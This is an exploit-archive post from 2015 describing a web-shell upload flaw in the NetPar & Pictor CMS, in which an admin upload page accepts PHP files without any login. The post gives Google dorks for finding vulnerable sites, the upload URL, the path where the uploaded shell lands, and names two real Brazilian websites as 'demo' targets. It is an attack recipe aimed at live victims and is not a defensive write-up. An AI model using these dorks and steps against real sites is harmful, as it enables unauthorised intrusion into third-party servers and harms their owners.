facebook facebook twitter rss

NetPar & Pictor Shell Upload Vulnerability

Author: bRpsd , Published: 25-06-2015
########################################################
[+] Title => NetPar & Pictor Shell Upload Vulnerability

[+] Date => 26 June 2015

[+] Author => bRpsd
Skype => vegnox
eMail => cy@live.no


[+] Software Homepage => http://netpar.com.br/

[+] Google Dorks =>
Dork1: intext:Hospedado na NETPAR inurl:index.php?pag=

Dork2: intext:Produzido pela PICTOR Hospedado na NETPAR

########################################################

Infected File: http://localhost/noticias/admin/upload.php
Problem (bug) : Dosent required admin cookies or login
Problem2 (bug): No protection against uploading a file with PHP extension


Exploit: {Shell Upload } , Upload as (shell.php) No bypass required!

http://localhost/noticias/admin/upload.php?pag=admin&sub=

Shell Path (Location) :

http://localhost/noticias/admin/fotos/SHELL HERE .php

# The shell will be a numeric value, w0w .. so secured! (:

DEMO (For Testing):

http://www.hwc.com.br/noticias/admin/upload.php?pag=admin&sub=

http://www.goncalvesmarcasepatentes.com.br/noticias/admin/upload.php?pag=admin&sub=

http://www.goncalvesmarcasepatentes.com.br/noticias/admin/upload.php?pag=admin&sub=



Ramadan Mubarak!



Enjoy ! , Aurevoir! <3

Like us on Facebook :